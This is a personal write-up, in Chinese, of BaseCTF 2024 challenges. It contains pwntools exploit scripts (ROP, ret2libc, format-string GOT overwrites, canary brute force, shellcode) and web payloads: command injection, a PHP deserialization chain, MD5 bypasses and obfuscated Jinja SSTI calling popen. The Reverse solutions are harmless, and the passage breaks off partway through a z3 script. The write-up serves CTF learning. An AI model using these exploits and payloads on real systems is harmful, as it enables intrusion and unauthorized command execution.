BaseCTF2024 个人WP

Pwn:

[Week1] 签个到吧:

直接nc,ls,cat flag

[Week1] echo:

只能使用echo命令

那就用echo *代替ls输出当前目录所有文件

用echo $(<flag)输出flag

[Week1] Ret2text:

简单的栈溢出

from pwn import *

# Ret2text: the saved return address is replaced with the backdoor function's address.
p = process('./Ret2text')
p = remote('challenge.basectf.fun', 33358)  # replaces the local handle above (which is never closed)
backdoor = 0x4011BB

padding = b'a' * 0x28            # bytes between the buffer start and the saved return address
payload = padding + p64(backdoor)
p.sendline(payload)
p.interactive()

[Week1] shellcode_level0:

简单的shellcode

from pwn import *

context(arch='amd64')   # asm() and shellcraft need the target arch
p = process('./shellcode')
p = remote('challenge.basectf.fun', 28688)  # replaces the local handle above

# pwntools' stock /bin/sh shellcode, assembled for amd64
p.sendline(asm(shellcraft.sh()))
p.interactive()

[Week1] 我把她丢了:

64位函数参数传递

from pwn import *

context(arch='amd64')
p = process('./her')
p = remote('challenge.basectf.fun', 20629)  # replaces the local handle above

system = 0x40120F
binsh = 0x402008
pop_rdi = 0x0000000000401196
ret = 0x000000000040101a   # defined but not used in this chain

# x86-64 SysV: first argument travels in rdi, hence the pop rdi gadget before system
chain = [pop_rdi, binsh, system]
payload = b'a' * 0x78 + b''.join(p64(addr) for addr in chain)
p.sendline(payload)
p.interactive()

[Week1] 彻底失去她:

from pwn import *

p = process('./her')
p = remote('challenge.basectf.fun', 28858)  # replaces the local handle above

pop_rdi = 0x0000000000401196
pop_rdx = 0x0000000000401265
pop_rsi = 0x00000000004011ad
sh = 0x0000000000402065          # unused below
ret = 0x000000000040101a
system = 0x401080
read_plt = 0x401090
bss = 0x4040A0
elf = ELF('./her')
main = elf.sym['main']

PAD = b'a' * (0xa + 8)   # buffer plus saved rbp


def chain(*addrs):
    """Pack a list of 64-bit addresses back to back."""
    return b''.join(p64(a) for a in addrs)


# round 1: read(0, bss, 0x100), then return to main for a second overflow
p.sendline(PAD + chain(pop_rdi, 0, pop_rsi, bss, pop_rdx, 0x100, read_plt, main))
sleep(0.2)
p.sendline(b'/bin/sh')   # consumed by the read above, so the string now lives in .bss
# round 2: system(bss); the leading ret gadget is kept from the original chain (presumably for stack alignment)
p.sendline(PAD + chain(ret, pop_rdi, bss, system))
p.interactive()

[Week2] format_string_level1:

感觉都很简单

from pwn import *

p = process('./format')
p = remote('challenge.basectf.fun', 48639)  # replaces the local handle above
target = 0x4040B0

# %n stores the number of bytes printed so far (4, for 'aaaa') into the pointer at argument 7,
# which is the address appended right after the format string
payload = b'aaaa%7$n' + p64(target)
p.sendline(payload)
p.interactive()

[Week2] 她与你皆失:

from pwn import *

p = process('./her')
p = remote('challenge.basectf.fun', 36442)  # replaces the local handle above

pop_rdi = 0x0000000000401176
pop_rsi = 0x0000000000401178   # unused below
pop_rdx = 0x0000000000401221   # unused below
ret = 0x000000000040101a
puts_plt = 0x401060
puts_got = 0x404018
main = 0x4011DF

PAD = b'a' * (0xa + 8)


def chain(*addrs):
    """Pack a list of 64-bit addresses back to back."""
    return b''.join(p64(a) for a in addrs)


# leak: puts(puts_got) prints puts' libc address, then main runs again
p.sendline(PAD + chain(pop_rdi, puts_got, puts_plt, main))
leaked = p.recvuntil(b'\x7f')[-6:]
puts_addr = u64(leaked.ljust(8, b'\x00'))

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')   # assumes the local libc matches the remote one
libcbase = puts_addr - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh'))

# second overflow: system("/bin/sh"); the ret gadget is kept from the original chain
p.sendline(PAD + chain(ret, pop_rdi, binsh, system))
p.interactive()

[Week2] format_string_level0:

from pwn import *

p = process('./format')
p = remote('challenge.basectf.fun', 22035)  # replaces the local handle above

# %8$s prints whatever string the 8th variadic slot points to
p.sendline(b'%8$s')
p.interactive()
#10   (author's trailing note, kept as written)

[Week2] shellcode_level1:

from pwn import *

context(arch='amd64')
p = process('./shellcode')
p = remote('challenge.basectf.fun', 47154)  # replaces the local handle above


def gdbs():
    """Attach gdb to the live target and pause (debug helper, not called below)."""
    gdb.attach(p)
    pause()


# stage 1: a single `syscall` instruction
stage1 = asm('''
syscall
''')
print(len(stage1))
# gdbs()
p.send(stage1)
# stage 2: two NUL bytes followed by the stock /bin/sh shellcode
stage2 = b'\x00' * 2 + asm(shellcraft.sh())
p.sendline(stage2)
p.interactive()

[Week3] 你为什么不让我溢出:

from pwn import *

p = process('./overpwn')
p = remote('challenge.basectf.fun', 33358)  # replaces the local handle above
backdoor = 0x4011BE

# step 1: fill the buffer right up to the canary so the program's next output leaks it
p.sendlineafter(b'Hello Hacker!', b'a' * 0x68)
p.recvline()
p.recvline()
canary = u64(b'\x00' + p.recv(7))   # the canary's low byte is always 0x00
print(hex(canary))

# step 2: overflow again, putting the canary back in place before saved rbp and the return address
payload = b'a' * (0x70 - 0x8) + p64(canary) + b'a' * 0x8 + p64(backdoor)
p.sendline(payload)
p.interactive()

[Week3] format_string_level2:

from pwn import*
p=process('./format')
p=remote('challenge.basectf.fun',35702)   # replaces the local handle above (never closed)
elf=ELF('./format')
read_got=elf.got['read']
printf_got=elf.got['printf']

def gdbs():
    # debug helper: attach gdb to the live target and pause; not called below
    gdb.attach(p)
    pause()

# leak read@GLIBC: %7$s prints the string at the address that follows the 8-byte prefix
payload=b'aaaa%7$s'+p64(read_got)
p.send(payload)
read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(read_addr))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')   # assumes the local libc matches the remote one
libcbase=read_addr-libc.sym['read']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))   # computed but unused below
gadget=[0xebc81]
onegadget=libcbase+gadget[0]   # computed but unused below
# write the low 3 bytes of system into printf's GOT entry: %hhn writes byte 0 through arg 10,
# %hn writes bytes 1-2 through arg 11 (widths are cumulative, hence the subtraction)
# NOTE(review): if (system>>8)&0xffff is smaller than system&0xff the second width goes negative
# and the write is wrong; the script does not handle that case
payload=b'%'+str(system&0xff).encode()+b'c%10$hhn'+b'%'+str((system>>8&0xffff)-(system&0xff)).encode()+b'c%11$hn'
payload=payload.ljust(0x20,b'\x00')   # pad so the two addresses land exactly at args 10 and 11
payload+=p64(printf_got)+p64(printf_got+1)
p.sendline(payload)
p.interactive()
#6

[Week3] stack_in_stack:

from pwn import*
context(log_level='debug')
p=process('./stack')
p=remote('challenge.basectf.fun',38027)   # replaces the local handle above (never closed)
elf=ELF('./stack')
leave_ret=0x00000000004012f2
secret=0x4011C6
main=0x401245
start=0x4010E0
ret=0x000000000040101a

def gdbs():
    # debug helper: attach gdb and pause; not called below
    gdb.attach(p)
    pause()

# the program prints a "0x" + 12 hex digit address; it is parsed as the buffer's address
p.recvuntil(b'0x')
buf=int(b'0x'+p.recv(12),16)
# stack pivot: a fake frame [secret, start] at the start of buf, then saved rbp = buf-8
# and leave;ret as the return address so rsp lands on the fake frame
payload=p64(secret)+p64(start)
payload=payload.ljust(0x30,b'\x90')
payload+=p64(buf-8)+p64(leave_ret)
p.send(payload)

# the 15 characters after the banner are parsed as a hex address and treated as puts' address
p.recvuntil(b'You found the secret!')
puts_addr=int(p.recv(15),16)
print(hex(puts_addr))

libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')   # assumes the local libc matches the remote one
libcbase=puts_addr-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
pop_rdi=libcbase+0x000000000002a3e5   # libc-relative gadget offset; only valid for this libc build
# second run (entered via _start): same pivot, this time onto a system("/bin/sh") chain
p.recvuntil(b'0x')
buf=int(b'0x'+p.recv(12),16)
print(hex(buf))
payload=p64(pop_rdi)+p64(binsh)+p64(system)
payload=payload.ljust(0x30,b'\x90')
payload+=p64(buf-8)+p64(leave_ret)
#gdbs()
p.send(payload)
p.interactive()

[Week3] PIE:

from pwn import *

p = process('./pie')
p = remote('challenge.basectf.fun', 21887)  # replaces the local handle above

OVERFLOW = b'a' * 0x108

# partial overwrite: only the two low bytes of the saved return address are replaced
p.send(OVERFLOW + b'\x40\x5e')
leaked = p.recvuntil(b'\x7f')[-6:]
libc_start_main = u64(leaked.ljust(8, b'\x00')) - 128

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')   # assumes the local libc matches the remote one
libcbase = libc_start_main - libc.sym['__libc_start_main']
ret = libcbase + 0x0000000000029139         # libc-relative gadget offsets, valid for this libc build only
pop_rdi = libcbase + 0x000000000002a3e5
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh'))

chain = [ret, pop_rdi, binsh, system]
p.send(OVERFLOW + b''.join(p64(addr) for addr in chain))
p.interactive()

[Week4] orz!:

from pwn import *

context(arch='amd64')
p = process('./orz')
p = remote('challenge.basectf.fun', 46972)  # replaces the local handle above


def gdbs():
    """Attach gdb to the live target and pause (debug helper, not called below)."""
    gdb.attach(p)
    pause()


# openat(0, '/flag', 0) -> fd 3; mmap a small buffer; sendfile(stdout, 3, 0, 0x100); exit
parts = [
    shellcraft.openat(0, '/flag', 0),
    shellcraft.mmap(0x1000, 0x100, 1, 1, 'rax', 0),
    shellcraft.sendfile(1, 3, 0, 0x100),
    shellcraft.exit(),
]
p.sendline(asm(''.join(parts)))
p.interactive()

[Week4] format_string_level3:

from pwn import*
p=process('./format')
p=remote('challenge.basectf.fun',23822)   # replaces the local handle above (never closed)
elf=ELF('./format')
main=0x40121B
stack_fail=0x403320   # presumably __stack_chk_fail's GOT slot (named after it; sits between puts_got and printf_got)
puts_got=0x403318
read_got=0x403330     # unused below
printf_got=0x403328

def gdbs():
    # debug helper: attach gdb and pause; not called below
    gdb.attach(p)
    pause()

# write 1: low byte of main via %10$hhn and bytes 1-2 via %11$hn into stack_fail / stack_fail+1
# NOTE(review): the second width is (bytes 1-2) - (byte 0); if that difference is negative the write is wrong
payload=b'%'+str((main&0xff)).encode()+b'c%10$hhn'+b'%'+str((main>>8&0xffff)-(main&0xff)).encode()+b'c%11$hn'
payload=payload.ljust(0x20,b'\x00')   # the two target addresses must sit at format args 10 and 11
payload+=p64(stack_fail)+p64(stack_fail+1)
payload=payload.ljust(0x10f,b'a')     # padded to 0x10f bytes; presumably overruns the buffer so the stack check fires -- confirm against the binary
p.sendline(payload)
# leak: %7$s prints the string at the address placed right after the 8-byte prefix
payload=b'aaaa%7$s'+p64(puts_got)
payload=payload.ljust(0x10f,b'a')
p.sendline(payload)
puts_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')   # assumes the local libc matches the remote one
libcbase=puts_addr-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))   # computed but unused below
# write 2: same layout, this time the low 3 bytes of system into printf's GOT entry
payload=b'%'+str((system&0xff)).encode()+b'c%10$hhn'+b'%'+str((system>>8&0xffff)-(system&0xff)).encode()+b'c%11$hn'
payload=payload.ljust(0x20,b'\x00')
payload+=p64(printf_got)+p64(printf_got+1)
payload=payload.ljust(0x10f,b'a')
p.sendline(payload)
payload=b'/bin/sh'   # the next printf(buffer) call now reaches system
p.sendline(payload)
p.interactive()
#6
#6

[Week4] 没有 canary 我要死了!:

from pwn import*
from ctypes import*
context(log_level='debug')
p=process('./canary')
p=remote('challenge.basectf.fun',21074)   # replaces the local handle above (never closed)

def gdbs():
    # debug helper: attach gdb and pause; not called below
    gdb.attach(p)
    pause()

# reproduce the target's rand() sequence locally: same libc, seeded with the current time in seconds.
# This only lines up if the remote seeds srand(time(NULL)) in the same second and uses the same libc.
dll=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
seed=time.time()   # `time` is not imported explicitly; presumably exported by `from pwn import *`
dll.srand(int(seed))
canary=b'\x00'   # the canary's lowest byte is always 0x00

# recover the remaining 7 canary bytes one at a time: a wrong byte presumably makes the program
# print a line containing '***' (glibc's stack-smashing message), a right byte does not
for k in range(7):
    for i in range(0,256):
        p.sendlineafter(b'BaseCTF',str(dll.rand()%50))   # answer the number prompt with the predicted value
        payload=b'a'*0x68+canary+i.to_bytes(1,'little')
        p.sendafter(b'welcome',payload)
        p.recvline()
        datas=p.recvline()
        if b'***' in datas:
            continue
        else:
            canary+=i.to_bytes(1,'little')
            break
    # NOTE(review): if no value in 0..255 is accepted, canary is not extended and the same
    # position is silently retried on the next k; the final canary is then too short
canary=u64(canary.ljust(8,b'\x00'))
print("canary= "+hex(canary))
#gdbs()
p.sendlineafter(b'BaseCTF',str(dll.rand()%50))
# final overflow: correct canary, 8 bytes over saved rbp, then a 2-byte partial overwrite of the return address
payload=b'a'*0x68+p64(canary)+b'a'*0x8+b'\xae\x12'
p.sendafter(b'welcome',payload)

p.interactive()

[Week4] ezstack:

from pwn import *

p = process('./ezstack')
p = remote('challenge.basectf.fun', 34973)  # replaces the local handle above

pop_rdi = 0x00000000004006f3
pop_rbx_rbp_r12_r13_r14_r15 = 0x4006ea
magic = 0x400658
offset = -0x30880
setvbuf_got = 0x601020
gets_plt = 0x4004F0
setvbuf_plt = 0x400500
bss = 0x601080


def chain(*addrs):
    """Pack a list of 64-bit values back to back."""
    return b''.join(p64(a) for a in addrs)


payload = b'a' * 0x10
# pop rbx,rbp,r12..r15: rbx = offset (as an unsigned 64-bit value), rbp = setvbuf_got + 0x3d, r12..r15 = 0, then `magic`
payload += chain(pop_rbx_rbp_r12_r13_r14_r15, offset & 0xffffffffffffffff, setvbuf_got + 0x3d, 0, 0, 0, 0, magic)
payload += chain(pop_rdi, bss, gets_plt)      # gets(bss): reads the next line into .bss
payload += chain(pop_rdi, bss, setvbuf_plt)   # setvbuf@plt(bss); presumably its GOT entry was rewritten by `magic` -- not verifiable here
p.sendline(payload)
p.sendline(b'/bin/sh')
p.interactive()

Web:

[Week1] A Dark Room:

直接看源代码,直接有flag

[Week1] HTTP 是什么呀:

这里要满足条件才能给flag,但是满足后直接在网页看不见

用bp

base64解码得flag

[Week1] 喵喵喵´•ﻌ•`:

[Week1] md5绕过欸:

弱比较用科学计数法绕过,强比较用数组绕过

[Week1] upload:

传个一句话木马,用蚁剑连接就可以找到flag了

[Week1] Aura 酱的礼物:

payload:
pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@challenge.basectf.fun:32471/&gift=php://filter/read=convert.base64-encode/resource=flag.php

[Week2] 你听不到我的声音:

cmd=a=fl;b=ag;cp /$a$b /var/www/html/b.txt

[Week2] RCEisamazingwithspace:

空格过滤

cmd=tac${IFS}/flag

[Week2] ez_ser:

<?php
// Challenge classes (copied) plus the PHP that builds the serialized object graph. The chain is:
//   web::__wakeup echoes $kw  ->  re::__toString  ->  reads a property on $chu0 (a pwn object)
//   ->  pwn::__get  ->  $over->getflag()  (Misc::getflag)
class re{
    public $chu0;
    public function __toString(){
        if(!isset($this->chu0)){
            return "I can not believes!";
        }
        // $nononono is never assigned, so the property name is empty; the read still goes through
        // chu0's __get() when chu0 is a pwn object (the chain relies on this). Nothing is returned here.
        $this->chu0->$nononono;
    }
}

class web {
    public $kw;
    public $dt;

    public function __wakeup() {
        // string concatenation forces $this->kw to a string: this is the chain's entry point
        echo "lalalla".$this->kw;
    }

    public function __destruct() {
        echo "ALL Done!";
    }
}

class pwn {
    public $dusk;
    public $over;

    public function __get($name) {
        // the dusk check only prints a message; getflag() is called either way
        if($this->dusk != "gods"){
            echo "什么,你竟敢不认可?";
        }
        $this->over->getflag();
    }
}

class Misc {
    public $nothing;
    public $flag;

    public function getflag() {
        // the sink the chain is aimed at
        eval("system('cat /flag');");
    }
}

class Crypto {
    // decoy class: its getflag() does not read the flag
    public function __wakeup() {
        echo "happy happy happy!";
    }

    public function getflag() {
        echo "you are over!";
    }
}
// build the object graph and print it URL-encoded for submission
$p=new web();
$p->kw=new re();
$p->kw->chu0=new pwn();
$p->kw->chu0->dusk='gods';
$p->kw->chu0->over=new Misc();
echo urlencode(serialize($p));
?>

[Week2] 所以你说你懂 MD5?:

<?php
// Challenge source. Four stages, each comparing md5() of two POST values; the request line
// printed after this listing shows the values the author used for each stage.
session_start();
highlight_file(__FILE__);
// So you say you understand MD5 now?

$apple = $_POST['apple'];
$banana = $_POST['banana'];
// stage 1: raw POST values; no string cast, so non-string inputs (e.g. arrays) reach md5() unchanged
if (!($apple !== $banana && md5($apple) === md5($banana))) {
    die('加强难度就不会了?');
}

// What? You got past it?
// Raise the dose!
// I'll make it a string
$apple = (string)$_POST['appple'];
$banana = (string)$_POST['bananana'];
// stage 2: strings, but the hashes are compared with loose == (PHP type juggling applies)
if (!((string)$apple !== (string)$banana && md5((string)$apple) == md5((string)$banana))) {
    die('难吗?不难!');
}

// You still got past it?
// Oh, I missed an equals sign
$apple = (string)$_POST['apppple'];
$banana = (string)$_POST['banananana'];
// stage 3: strings and strict ===, so the two inputs must be a genuine MD5 collision
if (!((string)$apple !== (string)$banana && md5((string)$apple) === md5((string)$banana))) {
    die('嘻嘻, 不会了? 没看直播回放?');
}

// You thought that was it?
if (!isset($_SESSION['random'])) {
    // 48 random bytes, hex-encoded (96 characters), generated once per session
    $_SESSION['random'] = bin2hex(random_bytes(16)) . bin2hex(random_bytes(16)) . bin2hex(random_bytes(16));
}

// Want to see the value of random?
// Aren't you an MD5 expert? Then I'll just tell you its MD5
$random = $_SESSION['random'];
echo md5($random);
echo '<br />';

$name = $_POST['name'] ?? 'user';

// check if name ends with 'admin'
if (substr($name, -5) !== 'admin') {
    die('不是管理员也来凑热闹?');
}

$md5 = $_POST['md5'];
// stage 4: md5(secret . name) where md5(secret) and the secret's length are known;
// the padding-shaped `name` in the request below indicates a length-extension construction
if (md5($random . $name) !== $md5) {
    die('伪造? NO NO NO!');
}

// I give up, it looks like you really do understand MD5
// Then the flag is yours
echo "看样子你真的很懂 MD5";
echo file_get_contents('/flag');
apple[]=1&banana[]=2&appple=QNKCDZO&bananana=QLTHNDT&apppple=TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&banananana=TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&name=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin&md5=86d03cc0087099a697857dc510525a1f

[Week2] 数学大师:

直接用WP给的脚本

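import requests
import re

req = requests.session()
url = "http://challenge.basectf.fun:35473/"

# the page shows "<a> <op> <b>?" where op is one of + - × ÷; compiled once, used every round
EXPR_RE = re.compile(r" (\d*?)(.)(\d*)\?")
OPS = {
    "+": lambda a, b: a + b,
    "-": lambda a, b: a - b,
    "×": lambda a, b: a * b,
    "÷": lambda a, b: a // b,   # integer division, as in the original script
}

answer = 0
while True:
    # submit the previous answer and read the next question (the first round submits 0)
    response = req.post(url, data={"answer": answer})
    print(response.text)
    if "BaseCTF" in response.text:
        print(response.text)
        break
    match = EXPR_RE.search(response.text)
    if match is None:
        # the original crashed here with AttributeError on an unexpected page; stop with a clear message
        print("no arithmetic question found in the response; stopping")
        break
    lhs, op, rhs = match.group(1), match.group(2), match.group(3)
    if op in OPS:
        answer = OPS[op](int(lhs), int(rhs))
    else:
        # unchanged from the original: an unknown operator leaves `answer` as it was
        print(f"unknown operator {op!r}; resubmitting previous answer")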

[Week3] ez_php_jail:

感觉WP讲得很好

当 php 版本小于 8 时,GET 请求的参数名含有 . ,会被转为 _ ,但是如果参数名中有 [ ,这

个 [ 会被直接转为 _ ,但是后面如果有 . ,这个 . 就不会被转为 _ 。

Jail[by.Happy=highlight_file(glob("/f*")[0]);

[Week3] 复读机:

SSTI模板注入,稍微记一下。

方法1:

#payload1:
BaseCTF{% set chr= ''['_''_cl''ass_''_']['_''_ba''se_''_']['_''_subcla''sses_''_']()[137]['_''_in''it_''_']['_''_glo''bals_''_']['_''_bui''ltins_''_']['chr']%}
{% set cmd='cat '~chr(47)~'flag' %}
{%print(''['_''_cl''ass_''_']['_''_ba''se_''_']['_''_subcla''sses_''_']()[137]['_''_in''it_''_']['_''_glo''bals_''_']['po''pen'](cmd)['rea''d']())%}

#payload2:
% set cmd='cat '~'%c'%(47)~'flag' %}
{%print(''['_''_cl''ass_''_']['_''_ba''se_''_']['_''_subcla''sses_''_']()[137]['_''_in''it_''_']['_''_glo''bals_''_']['po''pen'](cmd)['rea''d']())%}

#payload3:
BaseCTF{%print(''['_''_cl''ass_''_']['_''_ba''se_''_']['_''_subcla''sses_''_']()[137]['_''_in''it_''_']['_''_glo''bals_''_']['po''pen']('cd $OLDPWD;cat flag')['rea''d']())%}

Reverse:

[Week1] You are good at IDA:

直接从IDA里面找flag的字符串

[Week1] UPX mini:

脱壳,然后base64解码

[Week1] ez_maze:

在shift+F12找到地图,走最短路径,把路径MD5编码

BaseCTF{131b7d6e60e8a34cb01801ae8de07efe}

[Week1] Ez Xor:

用动态调试找出result和key,根据异或规则,写出脚本解密

# ciphertext bytes recovered with the debugger
result = [0x01, 0x09, 0x05, 0x25, 0x26, 0x2D, 0x0B, 0x1D, 0x24, 0x7A,
          0x31, 0x20, 0x1E, 0x49, 0x3D, 0x67, 0x4D, 0x50, 0x08, 0x25,
          0x2E, 0x6E, 0x05, 0x34, 0x22, 0x40, 0x3B, 0x25]

key = list("Xnp[kw^hzQeyTb|W\x7FcJ|fMye@vhC")

# byte i of the ciphertext is XORed with the key read from the end: key[27 - i]
flag = ''.join(chr(byte ^ ord(key[27 - i])) for i, byte in enumerate(result))

print(flag)

[Week1] BasePlus:

先把密文异或0xe

然后base64换表,这里要注意,如果原始表是64位要补到65位

import base64

result = 'bxhtLgTgAy92bfH6jJAhKlcGSgNljmThKmPt0oJ/<'
# custom alphabet (65 entries: 64 symbols plus the '=' pad) mapped back onto standard base64
CUSTOM = '/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC'
STANDARD = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
biao = str.maketrans(CUSTOM, STANDARD)
# the trailing '<' is not in either alphabet; b64decode discards it (non-strict mode)
flag = base64.b64decode(result.translate(biao))
print(flag)

[Week2] UPX:

手脱upx壳然后base64换表

[Week2] 喝杯下午茶:

#include <stdio.h>
#include <string.h>
#include <emmintrin.h>
#include <stdint.h>

/* TEA-style decryption of the two 32-bit words in v with the 128-bit key k.
 * Uses a non-standard delta (1131796 = 0x114514) and 32 rounds, undone in reverse;
 * the plaintext words are written back into v[0] and v[1]. */
void decrypt(unsigned int *v, unsigned int *k) {
	const int delta = 1131796;
	unsigned int left = v[0], right = v[1];
	int sum = delta * 32;   /* value of sum after 32 encryption rounds */
	for (int round = 0; round < 32; round++) {
		right -= ((left << 4) + k[2]) ^ (left + sum) ^ ((left >> 5) + k[3]);
		left  -= ((right << 4) + k[0]) ^ (right + sum) ^ ((right >> 5) + k[1]);
		sum -= delta;
	}
	v[0] = left;
	v[1] = right;
}

/* Decrypt the 40 ciphertext bytes in Buf2 word-pair by word-pair and print the result. */
int main() {
	/* ciphertext as ten 32-bit words; several literals exceed INT_MAX, so storing them in int
	 * is implementation-defined (fine on the usual two's-complement targets, compilers warn) */
	int Buf2[10]={0x94B1F1E7,0x21D5D352,0x5247793D,0x40D1C97,0xF36E7F74,0x9C53F70F,0x6AEACFD8,0x6F9F06F4,0xEAFD9E2E,0x32B655F7};
	unsigned int key[] = {0x11223344, 0x55667788, 0x99AABBCC, 0xDDEEFF11};
	
	char buf[50] = {0};   /* zero-initialised, so bytes 40..49 terminate the printed string */
	memcpy(buf, Buf2, sizeof Buf2);
	
	/* (unsigned int *)&buf + i advances in 4-byte units: word pairs (0,1), (2,3), ..., (8,9) */
	for(int i=0;i<=8;i+=2)
	{
		decrypt((unsigned int *)&buf+i, key);
	}
	
	printf("%s", buf);
	
	return 0;
}

[Week2] Ezpy:

用pydumpck把exe转为pyc,补全魔术头。生成PY,key在输出的pyc文件里,也转成py

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.10

import Key
import sys

# NOTE(review): raw decompiler output kept verbatim; it does not run as written.
# `lambda .0 = None: [...]` is how the decompiler rendered list comprehensions, the
# `return s` / `return k` lines landed inside the for loops, the two-statement "swap"
# is a mis-decompiled tuple swap, and the trailing `continue` / `return None` at module
# level are artifacts. The corrected script further down is the one actually used.
def init_Sbox(seed):
    k_b = (lambda .0 = None: [ ord(seed[i % len(seed)]) for i in .0 ])(range(256))
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + k_b[i]) % 256
        s[i] = s[j]   # decompiled as two assignments; the real code is a tuple swap
        s[j] = s[i]
        return s


def KeyStream(text, Sbox):
    s = Sbox.copy()
    (i, j) = (0, 0)
    k = [
        0] * len(text)
    for r in range(len(text)):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i] = s[j]   # same mis-decompiled swap as above
        s[j] = s[i]
        t = (s[i] + s[j]) % 256
        k[r] = s[t] ^ Key.keykey[r % len(Key.keykey)]   # keystream byte XORed with Key.keykey, cycled
        return k


def Encrypt(text, seed):
    Sbox = init_Sbox(seed)
    key = KeyStream(text, Sbox)
    enc = (lambda .0 = None: [ text[i] ^ key[i] for i in .0 ])(range(len(text)))
    return bytes(enc)

# expected ciphertext for the correct flag
enc = b'\xe6\xaeC~F\xf2\xe3\xbb\xac\x9a-\x02U\x85p\xeb\x19\xd1\xe4\xc93sG\xb0\xeb1\xb5\x05\x05\xc3\xd7\x00\x18+D\xbc\x0cO\x9em\xf1\xbd'
flag = input('Please input Your flag:')
flag = (lambda .0: [ ord(i) for i in .0 ])(flag)
flag = Encrypt(flag, Key.key)
if flag != enc:
    print("It's not flag!")
    continue
    print('You are right!')
    sys.exit(1)
    continue
    return None

解密

import sys

# 替换为实际的 Key 模块内容
class Key:
    """Stand-in for the original Key module; values taken from the dumped pyc."""

    key = 'yOU_f1nd_m3'            # seed string for the S-box (the original said: replace with the real key)
    keykey = [66, 97, 115, 101]    # per-byte XOR mask applied to the keystream; these bytes spell "Base"

def init_Sbox(seed):
    """Return the 256-entry permutation derived from *seed* (RC4-style key scheduling)."""
    seed_len = len(seed)
    key_bytes = [ord(seed[pos % seed_len]) for pos in range(256)]
    box = list(range(256))
    j = 0
    for i, kb in enumerate(key_bytes):
        j = (j + box[i] + kb) % 256
        box[i], box[j] = box[j], box[i]
    return box

def KeyStream(text, Sbox):
    """Produce len(text) keystream bytes from *Sbox* (RC4-style PRGA), each XORed with Key.keykey cyclically."""
    state = Sbox.copy()
    mask = Key.keykey
    i = j = 0
    stream = []
    for r in range(len(text)):
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        t = (state[i] + state[j]) % 256
        stream.append(state[t] ^ mask[r % len(mask)])
    return stream

def Encrypt(text, seed):
    """XOR each element of *text* (a sequence of ints) with the keystream for *seed*; return bytes."""
    stream = KeyStream(text, init_Sbox(seed))
    return bytes(a ^ b for a, b in zip(text, stream))

enc = b'\xe6\xaeC~F\xf2\xe3\xbb\xac\x9a-\x02U\x85p\xeb\x19\xd1\xe4\xc93sG\xb0\xeb1\xb5\x05\x05\xc3\xd7\x00\x18+D\xbc\x0cO\x9em\xf1\xbd'
# XOR stream cipher: running the ciphertext through Encrypt with the same key yields the plaintext
flag = Encrypt(enc, Key.key)

print(flag)

[Week2] RivestCipher:

比较抽象,蒙出来的,RC4,找出密文和密钥解密就行。

[Week2] lk:

from z3 import *

# one Int per position; k[0] is declared but never constrained or printed
k = [Int('k[%d]' % i) for i in range(21)]
s = Solver()

# Each row holds the coefficients of k[20], k[19], ..., k[1] (in that order) and the right-hand side.
# Rows 8 and 15 have no k[13] / k[3] term in the original; that is a 0 coefficient here.
EQUATIONS = [
    ([948, 887, 410, 978, 417, 908, 965, 987, 141, 257, 323, 931, 773, 851, 758, 891, 575, 616, 860, 283], 913686),
    ([938, 490, 920, 50, 568, 68, 35, 708, 938, 718, 589, 954, 974, 62, 580, 80, 111, 151, 421, 148], 630335),
    ([908, 590, 668, 222, 489, 335, 778, 622, 95, 920, 932, 892, 409, 392, 11, 113, 948, 674, 506, 182], 707525),
    ([479, 859, 410, 399, 891, 266, 773, 624, 34, 479, 465, 728, 447, 427, 890, 570, 716, 180, 571, 707], 724203),
    ([556, 798, 380, 716, 71, 901, 949, 304, 142, 679, 459, 814, 282, 49, 873, 169, 437, 199, 771, 807], 688899),
    ([465, 898, 979, 198, 156, 831, 856, 322, 25, 35, 369, 917, 522, 654, 235, 385, 469, 231, 496, 83], 604784),
    ([305, 928, 260, 793, 787, 708, 758, 236, 688, 747, 711, 195, 50, 648, 787, 376, 220, 33, 194, 585], 665485),
    ([767, 573, 22, 909, 598, 588, 136, 0, 848, 964, 311, 701, 653, 541, 443, 7, 976, 803, 273, 859], 727664),
    ([776, 59, 507, 164, 397, 744, 377, 768, 456, 799, 9, 215, 365, 181, 634, 818, 81, 236, 883, 95], 572015),
    ([873, 234, 381, 423, 960, 689, 617, 240, 933, 300, 998, 773, 484, 905, 806, 792, 606, 942, 422, 789], 875498),
    ([766, 7, 283, 900, 211, 305, 343, 696, 590, 736, 817, 603, 414, 828, 114, 845, 175, 212, 898, 988], 714759),
    ([220, 30, 788, 106, 574, 501, 366, 952, 121, 996, 735, 689, 998, 689, 729, 886, 860, 70, 466, 961], 778853),
    ([313, 748, 522, 864, 156, 362, 283, 49, 316, 79, 136, 299, 271, 604, 907, 540, 141, 620, 701, 866], 584591),
